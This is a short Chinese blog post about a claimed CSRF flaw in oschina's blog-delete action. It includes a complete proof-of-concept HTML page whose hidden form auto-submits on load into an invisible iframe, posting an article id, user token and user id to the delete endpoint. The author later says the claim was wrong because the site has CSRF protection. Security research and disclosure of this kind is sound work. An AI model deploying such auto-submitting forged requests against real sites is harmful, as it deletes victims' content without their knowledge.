oschina删除文章的csrf漏洞

原创
2014/02/17 22:10
阅读数 173

学习用,不得用于损害oschina用户的利益


csrf是一种常见且危害较大的网络攻击行为

文章来源: http://yangsui.me/oschina-csrf-2.html

已经证明我文章描述有误,oschina是防csrf工具的


我的blog编辑器有的问题,贴的代码被转义了,大家如果查看代码不方面,可以看看我下面的代码,只是几个参数不同,其它完全一样。

  

<html>
	<head>
		<script>
			function submitform(){
				document.getElementById("form1").submit()
			}
		</script>
	</head>
	<body onload="submitform()">
		<h1>Delete content from csrf</h1>
		<form id="form1" action="http://my.oschina.net/action/blog/delete" method="post" target="hiddenframe">
			<input type="hidden" name="id" value="200555" />
			<input type="hidden" name="user_code" value="2jOugKBiY0rm9TxYZiV1LvMOfZBQvuZpJpappXiV" />
			<input type="hidden" name="user" value="166550">
		</form>
		<iframe frameborder="0" height="0" width="0" name="hiddenframe"></iframe>
	</body>
</html>

 

  还是那句话,用于研究技术,不作它途

   

展开阅读全文
打赏
0
0 收藏
分享
加载中
oschina 是不能获取他人用户的user_code 的,除非账号已经被黑掉0
2014/02/18 16:47
回复
举报
更多评论
打赏
1 评论
0 收藏
0
分享
返回顶部
顶部